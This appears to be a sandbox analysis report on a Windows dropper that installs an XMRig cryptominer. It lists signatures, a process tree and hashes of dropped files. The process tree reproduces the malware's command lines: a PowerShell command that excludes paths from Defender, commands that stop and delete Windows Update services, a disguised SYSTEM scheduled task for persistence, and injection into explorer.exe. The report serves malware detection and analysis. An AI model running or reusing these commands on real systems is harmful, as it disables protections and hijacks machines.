Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    14-07-2022 03:01

General

  • Target

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

  • Size

    7.5MB

  • MD5

    a29f3494661a52e3c66a2908389c5010

  • SHA1

    1645351e4b00a678ad7c4ac7784bf8d9c8703297

  • SHA256

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266

  • SHA512

    1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
    "C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1844
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:584
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1428
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1240
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1696
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:1068
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:820
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:1264
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:2000
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:628
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1144
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:1072
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:428
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:760
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1740
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1704
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1980
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:552
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1380
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:2000
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1464
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1548
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:1668
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:944
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1604
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:1500
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                          PID:1992
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1468
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1580
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1060
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:840
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                          4⤵
                            PID:1416
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                              5⤵
                              • Creates scheduled task(s)
                              PID:960
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            4⤵
                              PID:1560
                              • C:\Windows\system32\schtasks.exe
                                schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                5⤵
                                  PID:1572
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Windows\Temp\run.bat" "
                            2⤵
                            • Drops startup file
                            PID:1652
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Windows\Temp\lol.bat" "
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1744
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                              3⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:1164
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1164 CREDAT:275457 /prefetch:2
                                4⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:852
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {B0B70B22-F6DE-4B07-8CDE-9E550A3210C8} S-1-5-18:NT AUTHORITY\System:Service:
                          1⤵
                          • Loads dropped DLL
                          PID:1536
                          • C:\Program Files\Chrome\updater.exe
                            "C:\Program Files\Chrome\updater.exe"
                            2⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:1320
                            • C:\Windows\System32\conhost.exe
                              "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                              3⤵
                              • Drops file in Drivers directory
                              • Suspicious use of SetThreadContext
                              • Drops file in Program Files directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1980
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                4⤵
                                  PID:324
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                    5⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1264
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                  4⤵
                                    PID:1500
                                    • C:\Windows\system32\sc.exe
                                      sc stop UsoSvc
                                      5⤵
                                      • Launches sc.exe
                                      PID:1492
                                    • C:\Windows\system32\sc.exe
                                      sc stop WaaSMedicSvc
                                      5⤵
                                      • Launches sc.exe
                                      PID:1416
                                    • C:\Windows\system32\sc.exe
                                      sc stop wuauserv
                                      5⤵
                                      • Launches sc.exe
                                      PID:968
                                    • C:\Windows\system32\sc.exe
                                      sc stop bits
                                      5⤵
                                      • Launches sc.exe
                                      PID:1604
                                    • C:\Windows\system32\sc.exe
                                      sc stop dosvc
                                      5⤵
                                      • Launches sc.exe
                                      PID:1668
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                      5⤵
                                      • Modifies registry key
                                      PID:2000
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1524
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1660
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1492
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                      5⤵
                                      • Modifies registry key
                                      PID:2016
                                    • C:\Windows\system32\takeown.exe
                                      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                      5⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:944
                                    • C:\Windows\system32\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                      5⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:1604
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1264
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1668
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:2000
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1524
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                      5⤵
                                        PID:1652
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                        5⤵
                                          PID:272
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                          5⤵
                                            PID:1572
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                            5⤵
                                              PID:1168
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                              5⤵
                                                PID:944
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                5⤵
                                                  PID:520
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                  5⤵
                                                    PID:1364
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                    PID:1896
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -hibernate-timeout-ac 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:664
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -hibernate-timeout-dc 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1652
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -standby-timeout-ac 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1168
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -standby-timeout-dc 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1740
                                                  • C:\Windows\System32\conhost.exe
                                                    C:\Windows\System32\conhost.exe
                                                    4⤵
                                                      PID:1580
                                                      • C:\Windows\System32\conhost.exe
                                                        "C:\Windows\System32\conhost.exe" "adjdyakvdkolri"
                                                        5⤵
                                                          PID:284
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe zhcixymdmjms1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1652

                                                Network

                                                MITRE ATT&CK Enterprise v6

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Program Files\Chrome\updater.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  0c9bed327840bbe964e85913d5868fcb

                                                  SHA1

                                                  ef0b874b57be491ae87ed0237a025d5580265218

                                                  SHA256

                                                  3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                  SHA512

                                                  12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                • C:\Program Files\Chrome\updater.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  0c9bed327840bbe964e85913d5868fcb

                                                  SHA1

                                                  ef0b874b57be491ae87ed0237a025d5580265218

                                                  SHA256

                                                  3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                  SHA512

                                                  12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  60KB

                                                  MD5

                                                  589c442fc7a0c70dca927115a700d41e

                                                  SHA1

                                                  66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                  SHA256

                                                  2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                  SHA512

                                                  1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  340B

                                                  MD5

                                                  0504ea0b2bdc78ab54313fc9404836e8

                                                  SHA1

                                                  f4ccc2acb595c585ed36a312c43c866b15332d4d

                                                  SHA256

                                                  8042f0b5c5b65da2364141081f1d9fb4e74d6d0fc3b77121fcecdbea3d4cc044

                                                  SHA512

                                                  09ab38ec993ab535c370231149dba23da71a09e95287d7d0321fa8ccfe85bb5cfd37ef767ce53e007cd7df3cb6eaf4f18baba850101db9d8f5f0f6728bf9f60c

                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\EZZ4MTFV.txt
                                                  Filesize

                                                  598B

                                                  MD5

                                                  0d3301be9c2f2f2903269cdf1802e344

                                                  SHA1

                                                  5e709358473e5a44fa67f31703593cc4c0ecc155

                                                  SHA256

                                                  dceb49096b526d7e3c6665afee23a6e6af970cbe2a76993ae5d61ac86fee665e

                                                  SHA512

                                                  50b917f4413995a9ed22b993ca678ed81b116fd0646e59491f44d4d3aabe8142673d89bdd51ba79e85ae7f0b6a02d5045a8f957cb034e8ee1b8b090ffce94eac

                                                • C:\Windows\Temp\lol.bat
                                                  Filesize

                                                  59B

                                                  MD5

                                                  f580e0e80cc87b25e38ea2c0c8059d04

                                                  SHA1

                                                  299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                  SHA256

                                                  9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                  SHA512

                                                  5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                • C:\Windows\Temp\run.bat
                                                  Filesize

                                                  98B

                                                  MD5

                                                  731afe244b2414169a5f630d52646e56

                                                  SHA1

                                                  e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                  SHA256

                                                  6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                  SHA512

                                                  84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  0c9bed327840bbe964e85913d5868fcb

                                                  SHA1

                                                  ef0b874b57be491ae87ed0237a025d5580265218

                                                  SHA256

                                                  3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                  SHA512

                                                  12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  0c9bed327840bbe964e85913d5868fcb

                                                  SHA1

                                                  ef0b874b57be491ae87ed0237a025d5580265218

                                                  SHA256

